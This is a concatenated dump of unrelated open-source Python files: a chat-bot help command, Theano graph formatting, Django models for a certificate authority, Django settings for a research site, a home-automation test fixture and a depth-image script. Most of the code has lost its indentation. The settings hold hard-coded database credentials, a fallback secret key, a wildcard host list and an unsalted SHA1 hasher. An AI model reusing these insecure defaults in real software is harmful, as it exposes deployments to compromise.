"|-----------------| ------------------------------------|-------------------------------------------------|\n" +
f"| **hello** | Hello Command | {botPrefix}hello |\n" +
f"| **httpcat** | HTTP Cats go brrr | {botPrefix}httpcat [http code] |\n" +
f"| **ghr** | Preview a Github Repo | {botPrefix}ghr [username/orgname] [reponame]|\n" +
f"| **memoryleak** | SEGFAULT moment. | {botPrefix}memoryleak |\n" +
f"| **gasp** | Just find out for yourself. | {botPrefix}gasp |\n" +
f"| **token** | So about that funky config.toml... | {botPrefix}token |\n\n" +
"Bot writen by **HiItsDevin_**, powered by **[defectio](https://github.com/Darkflame72/defectio)**, a Revolt Python bot library. Written with 💖!",
mention=True)
def setup(bot):
bot.add_cog(HelpRevolt(bot))
logger.debug("Help Cog loaded.")
avg_line_length: 50.322581 | max_line_length: 158 | alphanum_fraction: 0.444872

hexsha: 5e7829faace32049e6eb23d942b397979a177100 | size: 12,029 | ext: py | lang: Python
repo_path: theano/d3viz/formatting.py | repo_name: michaelosthege/aesara | repo_head_hexsha: 55c88832ba71f87c9612d573ede74a4c042ef570 | licenses: ["BSD-3-Clause"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
"""Functions for formatting Theano compute graphs.
Author: Christof Angermueller <cangermueller@gmail.com>
"""
import os
from functools import reduce
import numpy as np
import theano
from theano.compile import Function, builders
from theano.gof.fg import FunctionGraph
from theano.gof.graph import Apply, Constant, Variable
from theano.gof.graph import inputs as graph_inputs
from theano.printing import pydot_imported, pydot_imported_msg
try:
from theano.printing import pd
except ImportError:
pass
class PyDotFormatter:
"""Create `pydot` graph object from Theano function.
Parameters
----------
compact : bool
if True, will remove intermediate variables without name.
Attributes
----------
node_colors : dict
Color table of node types.
apply_colors : dict
Color table of apply nodes.
shapes : dict
Shape table of node types.
"""
def __init__(self, compact=True):
"""Construct PyDotFormatter object."""
if not pydot_imported:
raise ImportError("Failed to import pydot. " + pydot_imported_msg)
self.compact = compact
self.node_colors = {
"input": "limegreen",
"constant_input": "SpringGreen",
"shared_input": "YellowGreen",
"output": "dodgerblue",
"unused": "lightgrey",
}
self.apply_colors = {
"GpuFromHost": "red",
"HostFromGpu": "red",
"Scan": "yellow",
"Shape": "cyan",
"IfElse": "magenta",
"Elemwise": "#FFAABB", # dark pink
"Subtensor": "#FFAAFF", # purple
"Alloc": "#FFAA22",
} # orange
self.shapes = {"input": "box", "output": "box", "apply": "ellipse"}
self.__node_prefix = "n"
def __add_node(self, node):
"""Add new node to node list and return unique id.
Parameters
----------
node : Theano graph node
Apply node, tensor variable, or shared variable in compute graph.
Returns
-------
str
Unique node id.
"""
assert node not in self.__nodes
_id = f"{self.__node_prefix}{len(self.__nodes) + 1}"
self.__nodes[node] = _id
return _id
def __node_id(self, node):
"""Return unique node id.
Parameters
----------
node : Theano graph node
Apply node, tensor variable, or shared variable in compute graph.
Returns
-------
str
Unique node id.
"""
if node in self.__nodes:
return self.__nodes[node]
else:
return self.__add_node(node)
def __call__(self, fct, graph=None):
"""Create pydot graph from function.
Parameters
----------
fct : theano.compile.function.types.Function
A compiled Theano function, variable, apply or a list of variables.
graph: pydot.Dot
`pydot` graph to which nodes are added. Creates new one if
undefined.
Returns
-------
pydot.Dot
Pydot graph of `fct`
"""
if graph is None:
graph = pd.Dot()
self.__nodes = {}
profile = None
if isinstance(fct, Function):
profile = getattr(fct, "profile", None)
fgraph = fct.maker.fgraph
elif isinstance(fct, FunctionGraph):
fgraph = fct
else:
if isinstance(fct, Variable):
fct = [fct]
elif isinstance(fct, Apply):
fct = fct.outputs
assert isinstance(fct, (list, tuple))
assert all(isinstance(v, Variable) for v in fct)
fgraph = FunctionGraph(inputs=graph_inputs(fct), outputs=fct)
outputs = fgraph.outputs
topo = fgraph.toposort()
outputs = list(outputs)
# Loop over apply nodes
for node in topo:
nparams = {}
__node_id = self.__node_id(node)
nparams["name"] = __node_id
nparams["label"] = apply_label(node)
nparams["profile"] = apply_profile(fgraph, node, profile)
nparams["node_type"] = "apply"
nparams["apply_op"] = nparams["label"]
nparams["shape"] = self.shapes["apply"]
use_color = None
for opName, color in self.apply_colors.items():
if opName in node.op.__class__.__name__:
use_color = color
if use_color:
nparams["style"] = "filled"
nparams["fillcolor"] = use_color
nparams["type"] = "colored"
pd_node = dict_to_pdnode(nparams)
graph.add_node(pd_node)
# Loop over input nodes
for id, var in enumerate(node.inputs):
var_id = self.__node_id(var.owner if var.owner else var)
if var.owner is None:
vparams = {
"name": var_id,
"label": var_label(var),
"node_type": "input",
}
if isinstance(var, Constant):
vparams["node_type"] = "constant_input"
elif isinstance(var, theano.tensor.sharedvar.TensorSharedVariable):
vparams["node_type"] = "shared_input"
vparams["dtype"] = type_to_str(var.type)
vparams["tag"] = var_tag(var)
vparams["style"] = "filled"
vparams["fillcolor"] = self.node_colors[vparams["node_type"]]
vparams["shape"] = self.shapes["input"]
pd_var = dict_to_pdnode(vparams)
graph.add_node(pd_var)
edge_params = {}
if hasattr(node.op, "view_map") and id in reduce(
list.__add__, node.op.view_map.values(), []
):
edge_params["color"] = self.node_colors["output"]
elif hasattr(node.op, "destroy_map") and id in reduce(
list.__add__, node.op.destroy_map.values(), []
):
edge_params["color"] = "red"
edge_label = vparams["dtype"]
if len(node.inputs) > 1:
edge_label = str(id) + " " + edge_label
pdedge = pd.Edge(var_id, __node_id, label=edge_label, **edge_params)
graph.add_edge(pdedge)
# Loop over output nodes
for id, var in enumerate(node.outputs):
var_id = self.__node_id(var)
if var in outputs or len(fgraph.clients[var]) == 0:
vparams = {
"name": var_id,
"label": var_label(var),
"node_type": "output",
"dtype": type_to_str(var.type),
"tag": var_tag(var),
"style": "filled",
}
if len(fgraph.clients[var]) == 0:
vparams["fillcolor"] = self.node_colors["unused"]
else:
vparams["fillcolor"] = self.node_colors["output"]
vparams["shape"] = self.shapes["output"]
pd_var = dict_to_pdnode(vparams)
graph.add_node(pd_var)
graph.add_edge(pd.Edge(__node_id, var_id, label=vparams["dtype"]))
elif var.name or not self.compact:
graph.add_edge(pd.Edge(__node_id, var_id, label=vparams["dtype"]))
# Create sub-graph for OpFromGraph nodes
if isinstance(node.op, builders.OpFromGraph):
subgraph = pd.Cluster(__node_id)
gf = PyDotFormatter()
# Use different node prefix for sub-graphs
gf.__node_prefix = __node_id
node.op.prepare_node(node, None, None, "py")
gf(node.op.fn, subgraph)
graph.add_subgraph(subgraph)
pd_node.get_attributes()["subg"] = subgraph.get_name()
def format_map(m):
return str([list(x) for x in m])
# Inputs mapping
ext_inputs = [self.__node_id(x) for x in node.inputs]
int_inputs = [gf.__node_id(x) for x in node.op.local_inputs]
assert len(ext_inputs) == len(int_inputs)
h = format_map(zip(ext_inputs, int_inputs))
pd_node.get_attributes()["subg_map_inputs"] = h
# Outputs mapping
ext_outputs = [self.__node_id(x) for x in node.outputs]
int_outputs = [gf.__node_id(x) for x in node.op.local_outputs]
assert len(ext_outputs) == len(int_outputs)
h = format_map(zip(int_outputs, ext_outputs))
pd_node.get_attributes()["subg_map_outputs"] = h
return graph
def var_label(var, precision=3):
"""Return label of variable node."""
if var.name is not None:
return var.name
elif isinstance(var, Constant):
h = np.asarray(var.data)
is_const = False
if h.ndim == 0:
is_const = True
h = np.array([h])
dstr = np.array2string(h, precision=precision)
if "\n" in dstr:
dstr = dstr[: dstr.index("\n")]
if is_const:
dstr = dstr.replace("[", "").replace("]", "")
return dstr
else:
return type_to_str(var.type)
def var_tag(var):
"""Parse tag attribute of variable node."""
tag = var.tag
if hasattr(tag, "trace") and len(tag.trace) and len(tag.trace[0]) == 4:
if isinstance(tag.trace[0][0], (tuple, list)):
path, line, _, src = tag.trace[0][-1]
else:
path, line, _, src = tag.trace[0]
path = os.path.basename(path)
path = path.replace("<", "")
path = path.replace(">", "")
src = src.encode()
return [path, line, src]
else:
return None
def apply_label(node):
"""Return label of apply node."""
return node.op.__class__.__name__
def apply_profile(fgraph, node, profile):
"""Return apply profiling informaton."""
if not profile or profile.fct_call_time == 0:
return None
time = profile.apply_time.get((fgraph, node), 0)
call_time = profile.fct_call_time
return [time, call_time]
def broadcastable_to_str(b):
"""Return string representation of broadcastable."""
named_broadcastable = {
(): "scalar",
(False,): "vector",
(False, True): "col",
(True, False): "row",
(False, False): "matrix",
}
if b in named_broadcastable:
bcast = named_broadcastable[b]
else:
bcast = ""
return bcast
def dtype_to_char(dtype):
"""Return character that represents data type."""
dtype_char = {
"complex64": "c",
"complex128": "z",
"float32": "f",
"float64": "d",
"int8": "b",
"int16": "w",
"int32": "i",
"int64": "l",
}
if dtype in dtype_char:
return dtype_char[dtype]
else:
return "X"
def type_to_str(t):
"""Return str of variable type."""
if not hasattr(t, "broadcastable"):
return str(t)
s = broadcastable_to_str(t.broadcastable)
if s == "":
s = str(t.dtype)
else:
s = dtype_to_char(t.dtype) + s
return s
def dict_to_pdnode(d):
"""Create pydot node from dict."""
e = dict()
for k, v in d.items():
if v is not None:
if isinstance(v, list):
v = "\t".join([str(x) for x in v])
else:
v = str(v)
v = str(v)
v = v.replace('"', "'")
e[k] = v
pynode = pd.Node(**e)
return pynode
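# Illustrative sketch (not part of the original module): formatting a tiny
# compiled function. Assumes a working Theano install with pydot/graphviz.
def _example_format(out_path="fct_graph.png"):
    import theano.tensor as tt
    x = tt.dmatrix("x")
    f = theano.function([x], tt.exp(x) / tt.exp(x).sum(axis=1, keepdims=True))
    graph = PyDotFormatter()(f)   # returns a pydot.Dot object
    graph.write_png(out_path)     # rendered via graphviz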
avg_line_length: 32.336022 | max_line_length: 87 | alphanum_fraction: 0.521157

hexsha: 94c6bdae97eb959bd08af7c11f91fa2aca3ce388 | size: 10,530 | ext: py | lang: Python
repo_path: python-ca/bjorn/models.py | repo_name: AS207960/bjorn | repo_head_hexsha: 8293b453df544822011b34b1a72bb41e941417dd | licenses: ["MIT"]
max_stars_count: 4 (2021-09-21T08:13:52.000Z to 2022-02-17T20:29:20.000Z)
max_issues_count: null
max_forks_count: 1 (2021-09-24T15:30:36.000Z to 2021-09-24T15:30:36.000Z)
from django.db import models
from django.contrib import admin
from django.utils import timezone
import secrets
import base64
import uuid
import cryptography.x509
import google.protobuf.json_format
from . import order_pb2
class Account(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=255)
def __str__(self):
return self.name
def make_account_key():
return secrets.token_bytes(32)
class AccountKey(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
account = models.ForeignKey(Account, on_delete=models.CASCADE, related_name='keys')
name = models.CharField(max_length=255)
secret = models.BinaryField(default=make_account_key)
@admin.display(description='Secret (Base64)')
def secret_str(self):
return base64.b64encode(self.secret).decode()
def __str__(self):
return f"{self.account.name}: {self.name}"
class Order(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
account = models.ForeignKey(Account, on_delete=models.CASCADE, blank=True, null=True, related_name='orders')
acme_account_id = models.TextField(blank=True, null=True)
expires_at = models.DateTimeField()
csr = models.BinaryField(blank=True, null=True)
certificate = models.OneToOneField('Certificate', on_delete=models.SET_NULL, blank=True, null=True, related_name='orders')
@property
def rpc_status(self):
authorizations = list(self.authorizations.all())
if self.certificate:
return order_pb2.OrderValid
elif self.csr:
return order_pb2.OrderProcessing
elif self.expires_at <= timezone.now():
return order_pb2.OrderInvalid
elif all(a.authorization.rpc_status == order_pb2.AuthorizationValid for a in authorizations):
return order_pb2.OrderReady
elif any(a.authorization.rpc_status in (
order_pb2.AuthorizationRevoked,
order_pb2.AuthorizationDeactivated,
order_pb2.AuthorizationInvalid,
order_pb2.AuthorizationExpired,
) for a in authorizations):
return order_pb2.OrderInvalid
else:
return order_pb2.OrderPending
def to_rpc(self):
authorizations = list(self.authorizations.all())
o = order_pb2.Order(
id=self.id.bytes,
identifiers=[i.to_rpc() for i in self.identifiers.all()],
not_before=None,
not_after=None,
status=self.rpc_status,
authorizations=[a.authorization.id.bytes for a in authorizations],
)
o.expires.FromDatetime(self.expires_at)
if self.certificate:
o.certificate_id.value = self.certificate.id.bytes
return o
ID_DNS = "dns"
IDENTIFIERS = (
(ID_DNS, "DNS"),
)
def id_to_rpc(id_type, identifier):
return order_pb2.Identifier(
identifier=identifier,
id_type=order_pb2.DNSIdentifier if id_type == ID_DNS else order_pb2.UnknownIdentifier
)
class OrderIdentifier(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
order = models.ForeignKey(Order, on_delete=models.CASCADE, related_name='identifiers')
id_type = models.CharField(max_length=64, choices=IDENTIFIERS)
identifier = models.TextField()
def __str__(self):
return f"{self.get_id_type_display()}: {self.identifier}"
def to_rpc(self):
return id_to_rpc(self.id_type, self.identifier)
class Authorization(models.Model):
STATE_PENDING = "p"
STATE_VALID = "v"
STATE_INVALID = "i"
STATES = (
(STATE_PENDING, "Pending"),
(STATE_VALID, "Valid"),
(STATE_INVALID, "Invalid"),
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
account = models.ForeignKey(Account, on_delete=models.CASCADE, blank=True, null=True, related_name='authorizations')
acme_account_id = models.TextField(blank=True, null=True)
state = models.CharField(max_length=1, choices=STATES)
expires_at = models.DateTimeField()
deactivated = models.BooleanField(blank=True)
revoked = models.BooleanField(blank=True)
id_type = models.CharField(max_length=64, choices=IDENTIFIERS)
identifier = models.TextField()
@property
def rpc_status(self):
if self.revoked:
return order_pb2.AuthorizationRevoked
elif self.deactivated:
return order_pb2.AuthorizationDeactivated
elif self.expires_at <= timezone.now():
return order_pb2.AuthorizationExpired
elif self.state == self.STATE_INVALID:
return order_pb2.AuthorizationInvalid
elif self.state == self.STATE_VALID:
return order_pb2.AuthorizationValid
else:
return order_pb2.AuthorizationPending
@property
def id_rpc(self):
return id_to_rpc(self.id_type, self.identifier)
def to_rpc(self):
challenges = []
if self.state == self.STATE_INVALID:
failed_challenge = self.challenges.filter(error__isnull=False).first()
challenges.append(failed_challenge.to_rpc())
elif self.state == self.STATE_VALID:
valid_challenge = self.challenges.filter(validated_at__isnull=False).first()
challenges.append(valid_challenge.to_rpc())
else:
for challenge in self.challenges.all():
challenges.append(challenge.to_rpc())
a = order_pb2.Authorization(
id=self.id.bytes,
status=self.rpc_status,
identifier=self.id_rpc,
challenges=challenges,
)
a.expires.FromDatetime(self.expires_at)
return a
class AuthorizationChallenge(models.Model):
TYPE_HTTP01 = "h"
TYPE_DNS01 = "d"
TYPE_TLSALPN01 = "t"
TYPES = (
(TYPE_HTTP01, "http-01"),
(TYPE_DNS01, "dns-01"),
(TYPE_TLSALPN01, "tls-alpn-01"),
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
authorization = models.ForeignKey(Authorization, on_delete=models.CASCADE, related_name='challenges')
validated_at = models.DateTimeField(blank=True, null=True)
processing = models.BooleanField(blank=True, default=False)
error = models.JSONField(blank=True, null=True)
type = models.CharField(max_length=1, choices=TYPES)
token = models.CharField(max_length=255, null=True, blank=True)
@property
def rpc_status(self):
if self.error:
return order_pb2.ChallengeInvalid
elif self.validated_at:
return order_pb2.ChallengeValid
elif self.processing:
return order_pb2.ChallengeProcessing
else:
return order_pb2.ChallengePending
def to_rpc(self):
if self.type == self.TYPE_HTTP01:
challenge_type = order_pb2.ChallengeHTTP01
elif self.type == self.TYPE_DNS01:
challenge_type = order_pb2.ChallengeDNS01
elif self.type == self.TYPE_TLSALPN01:
challenge_type = order_pb2.ChallengeTLSALPN01
else:
challenge_type = None
errors = None
if self.error:
errors = order_pb2.ErrorResponse()
google.protobuf.json_format.ParseDict(self.error, errors, ignore_unknown_fields=True)
a = order_pb2.Challenge(
id=self.id.bytes,
status=self.rpc_status,
type=challenge_type,
error=errors,
)
if self.validated_at:
a.validated.FromDatetime(self.validated_at)
if self.token:
a.token.value = self.token
return a
class OrderAuthorization(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
order = models.ForeignKey(Order, on_delete=models.CASCADE, related_name='authorizations')
authorization = models.ForeignKey(Authorization, on_delete=models.PROTECT, related_name='orders')
class IssuingCert(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
issued_by = models.ForeignKey('IssuingCert', on_delete=models.PROTECT, related_name='certificates', null=True, blank=True)
name = models.CharField(max_length=255)
cert = models.BinaryField()
crl_url = models.URLField(blank=True, null=True)
cert_url = models.URLField(blank=True, null=True)
ocsp_responder_url = models.URLField(blank=True, null=True)
def __str__(self):
return self.name
def cert_obj(self):
return cryptography.x509.load_der_x509_certificate(self.cert)
class Certificate(models.Model):
RevocationUnspecified = 1
RevocationKeyCompromise = 2
RevocationCACompromise = 3
RevocationAffiliationChanged = 4
RevocationSuperseded = 5
RevocationCessationOfOperation = 6
RevocationCertificateHold = 7
RevocationRemoveFromCRL = 8
RevocationPrivilegeWithdrawn = 9
RevocationAACompromise = 10
REVOCATION_REASONS = (
(RevocationUnspecified, "Unspecified"),
(RevocationKeyCompromise, "Key compromise"),
(RevocationCACompromise, "CA compromise"),
(RevocationAffiliationChanged, "Affiliation changed"),
(RevocationSuperseded, "Superseded"),
(RevocationCessationOfOperation, "Cessation of operation"),
(RevocationCertificateHold, "Certificate hold"),
(RevocationRemoveFromCRL, "Remove from CRL"),
(RevocationPrivilegeWithdrawn, "Privilege withdrawn"),
(RevocationAACompromise, "AA compromise"),
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
ee_cert = models.BinaryField()
issued_at = models.DateTimeField()
issued_by = models.ForeignKey(IssuingCert, on_delete=models.PROTECT, related_name='ee_certificates')
revoked = models.BooleanField(blank=True, default=False)
revocation_reason = models.PositiveSmallIntegerField(blank=True, null=True, choices=REVOCATION_REASONS)
revocation_timestamp = models.DateTimeField(blank=True, null=True)
invalidity_date = models.DateTimeField(blank=True, null=True)
def __str__(self):
serial = str(self.id.hex)
return ":".join(serial[i:i+2] for i in range(0, len(serial), 2))
def ee_cert_obj(self):
return cryptography.x509.load_der_x509_certificate(self.ee_cert)
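# Illustrative sketch (not part of the original module): the identifier helper
# above in isolation. The hostname is made up.
def _example_rpc_identifier():
    # DNS identifiers map to order_pb2.DNSIdentifier; any other id_type falls
    # back to order_pb2.UnknownIdentifier.
    return id_to_rpc(ID_DNS, "example.com")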
avg_line_length: 35.454545 | max_line_length: 126 | alphanum_fraction: 0.683761

hexsha: 073de9b6ddaf1493b757625b72c109f5457e525c | size: 6,857 | ext: py | lang: Python
repo_path: cognitive/settings.py | repo_name: poldracklab/cogat | repo_head_hexsha: 9eeaa2925c4bd65962e75ccb66baba0617e595cd | licenses: ["MIT"]
max_stars_count: 2 (2017-09-20T04:07:50.000Z to 2018-05-02T16:19:35.000Z)
max_issues_count: 119 (2017-03-10T19:00:45.000Z to 2020-06-22T14:03:16.000Z)
max_forks_count: 2 (2017-03-13T20:02:06.000Z to 2018-05-02T16:19:40.000Z)
"""
Django settings for cognitive atlas project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import sys
import os
from distutils.util import strtobool
from os.path import join, abspath, dirname
from py2neo import Graph
# Just for local development - will read this from secrets
graph = Graph("http://graphdb:7474", auth=("neo4j", "test"))
DOMAIN = "http://www.cognitiveatlas.org"
# PATH vars
PROJECT_ROOT = join(abspath(dirname(__file__)), ".")
sys.path.insert(0, join(abspath(PROJECT_ROOT), 'apps'))
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
ALLOWED_HOSTS = ["*"]
SITE_ID = 1
# Application definition
INSTALLED_APPS = [
'cognitive.apps.main',
'cognitive.apps.atlas',
'cognitive.apps.users',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.admin',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'crispy_forms',
]
# 'allauth',
# 'allauth.account',
# 'allauth.socialaccount',
# 'allauth.socialaccount.providers.dropbox',
# 'allauth.socialaccount.providers.dropbox_oauth2',
# 'allauth.socialaccount.providers.facebook',
# 'allauth.socialaccount.providers.github',
# 'allauth.socialaccount.providers.gitlab',
# 'allauth.socialaccount.providers.google',
# 'allauth.socialaccount.providers.linkedin',
# 'allauth.socialaccount.providers.linkedin_oauth2',
# 'allauth.socialaccount.providers.openid',
# 'allauth.socialaccount.providers.orcid',
# 'allauth.socialaccount.providers.stackexchange',
# 'allauth.socialaccount.providers.twitter',
INSTALLED_APPS += THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cognitive.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.request',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# CUSTOM CONTEXT PROCESSORS
TEMPLATES[0]['OPTIONS']['context_processors'].append(
"main.context_processors.counts_processor")
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
# 'allauth.account.auth_backends.AuthenticationBackend',
)
WSGI_APPLICATION = 'cognitive.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ.get('POSTGRES_NAME', ''),
'USER': os.environ.get('POSTGRES_USER', ''),
'PASSWORD': os.environ.get('POSTGRES_PASSWORD', ''),
'HOST': os.environ.get('POSTGRES_HOST', ''),
'PORT': os.environ.get('POSTGRES_PORT', ''),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
'django.contrib.auth.hashers.UnsaltedSHA1PasswordHasher',
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
MEDIA_ROOT = '/var/www/assets'
MEDIA_URL = '/assets/'
STATIC_ROOT = '/var/www/static'
STATIC_URL = '/static/'
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
CRISPY_TEMPLATE_PACK = 'bootstrap3'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
AUTH_USER_MODEL = 'users.User'
SECRET_KEY = os.environ.get(
'DJANGO_SECRET_KEY', 'verybadnotgoodsecretkeythatisntsecret')
DEBUG = strtobool(os.environ.get('DJANGO_DEBUG', 'False'))
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = '/logged_out/'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAuthenticatedOrReadOnly',
],
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
),
}
USE_RECAPTCHA = strtobool(os.environ.get('USE_RECAPTCHA', 'False'))
GOOGLE_RECAPTCHA_SECRET_KEY = os.environ.get('GOOGLE_RECAPTCHA_SECRET_KEY', '')
NOTIFY_EMAILS = os.environ.get("NOTIFY_EMAILS", "").split(" ")
EMAIL_HOST = os.environ.get("EMAIL_HOST", '')
EMAIL_PORT = os.environ.get("EMAIL_PORT", '')
EMAIL_HOST_USER = os.environ.get("EMAIL_HOST_USER", '')
EMAIL_HOST_PASSWORD = os.environ.get("EMAIL_HOST_PASSWORD", '')
EMAIL_USE_TLS = True
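# Illustrative note (not part of the original settings): every credential above
# is read from the environment, so a local run can be configured entirely from
# the shell, e.g. (made-up values):
#
#   POSTGRES_NAME=cogat POSTGRES_USER=cogat POSTGRES_HOST=db \
#   DJANGO_DEBUG=True python manage.py runserver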
avg_line_length: 29.943231 | max_line_length: 91 | alphanum_fraction: 0.710661

hexsha: 1274adb4b892c5ae2abf74b3b013d523a16f9bea | size: 917 | ext: py | lang: Python
repo_path: src/Modules/Families/UPB/test/xml_upb.py | repo_name: bopopescu/PyHouse_1 | repo_head_hexsha: 6444ed0b4c38ab59b9e419e4d54d65d598e6a54e | licenses: ["MIT"]
max_stars_count: 1 (2016-09-21T19:30:21.000Z to 2016-09-21T19:30:21.000Z)
max_issues_count: null
max_forks_count: 1 (2020-07-23T11:13:36.000Z to 2020-07-23T11:13:36.000Z)
"""
@name: PyHouse/src/Modules/Families/UPB/test/xml_upb.py
@author: D. Brian Kimmel
@contact: D.BrianKimmel@gmail.com
@copyright: (c) 2014-2015 by D. Brian Kimmel
@license: MIT License
@note: Created on Nov 9, 2014
@Summary:
"""
TESTING_UPB_ADDRESS = '255'
TESTING_UPB_NETWORK = '6'
TESTING_UPB_PASSWORD = '1253'
L_UPB_ADDRESS = ' <UPBAddress>' + TESTING_UPB_ADDRESS + '</UPBAddress>'
L_UPB_NETWORK = ' <UPBNetworkID>' + TESTING_UPB_NETWORK + '</UPBNetworkID>'
L_UPB_PASSWORD = ' <UPBPassword>' + TESTING_UPB_PASSWORD + '</UPBPassword>'
XML_UPB = '\n'.join([
L_UPB_ADDRESS,
L_UPB_NETWORK,
L_UPB_PASSWORD
])
UPB_XSD = """
<xs:element type="xs:byte" name="UPBNetworkID" minOccurs="0"/>
<xs:element type="xs:short" name="UPBPassword" minOccurs="0"/>
<xs:element type="xs:short" name="UPBAddress" minOccurs="0"/>
"""
# ## END DBK
avg_line_length: 27.787879 | max_line_length: 78 | alphanum_fraction: 0.649945

hexsha: 99b928d14cd3334a98584fd38ed58dfe30c26bab | size: 3,367 | ext: py | lang: Python
repo_path: statistic_tools.py | repo_name: shokah/pytorch-deeplab-xception | repo_head_hexsha: eda759b6935f048c80ba00981686eaf08c4366ae | licenses: ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
import os
from PIL import Image
import numpy as np
import matplotlib.pyplot as plt
def recursive_glob(rootdir='.', suffix=''):
"""Performs recursive glob with given suffix and rootdir
    :param rootdir: the root directory
    :param suffix: the suffix to be searched
"""
return [os.path.join(looproot, filename)
for looproot, _, filenames in os.walk(rootdir)
for filename in filenames if filename.endswith(suffix)]
def split_data(data):
    # Placeholder: the splitting logic has not been implemented yet.
    return None
def get_historgram(img_path, min_depth=0, max_depth=655.5):
depth = np.asarray(Image.open(img_path))
depth = decode_apollo(np.resize(depth, (513, 513, 3)))
plt.hist(depth, bins=655, range=(min_depth, max_depth), density=True, histtype='step')
plt.ylabel('Probability')
# plt.show()
def decode_apollo(depth_im):
R = depth_im[:, :, 0] / 255
G = depth_im[:, :, 1] / 255
real_depth = (R + G / 255.0) * 655.36
return real_depth
def depth_to_pointcloud(depth, calib_matrix, save_path='points.txt'):
points = []
k_inv = np.linalg.inv(calib_matrix)
xyz = np.zeros((depth.shape[0], depth.shape[1], 3))
for i in range(depth.shape[0]):
for j in range(depth.shape[1]):
p = depth[i, j] * k_inv.dot(np.array([j, i, 1]))
points.append(p)
xyz[i, j] = p
points = np.array(points)
np.savetxt(save_path, points)
print("point cloud created...\n")
return xyz
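# Illustrative sketch (not part of the original module): the pinhole
# back-projection used in depth_to_pointcloud, applied to a single pixel.
# For intrinsics K, pixel (u, v) at depth d maps to d * K^-1 @ [u, v, 1].
def _backproject_pixel(depth_value, u, v, calib_matrix):
    k_inv = np.linalg.inv(calib_matrix)
    return depth_value * k_inv.dot(np.array([u, v, 1]))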
if __name__ == '__main__':
# root = r"D:\Shai_Schneider\Apollo_dataset\val\Depth"
# files = recursive_glob(root)
# random_images = np.random.choice(len(files), size=len(files) // 10, replace=False)
#
# for file in random_images:
# get_historgram(files[file])
# # p = r"D:\Shai_Schneider\Apollo_dataset\val\Depth\09-00\CLEAR_SKY\DEGRADATION\With_Pedestrian\With_TrafficBarrier\Urban_Straight_Road\Traffic_093\0000000.png"
# # get_historgram(p, min_depth=0, max_depth=656)
# # p = r"D:\Shai_Schneider\Apollo_dataset\val\Depth\09-00\CLEAR_SKY\DEGRADATION\With_Pedestrian\With_TrafficBarrier\Downtown\Traffic_093\0000005.png"
# # get_historgram(p, min_depth=0, max_depth=656)
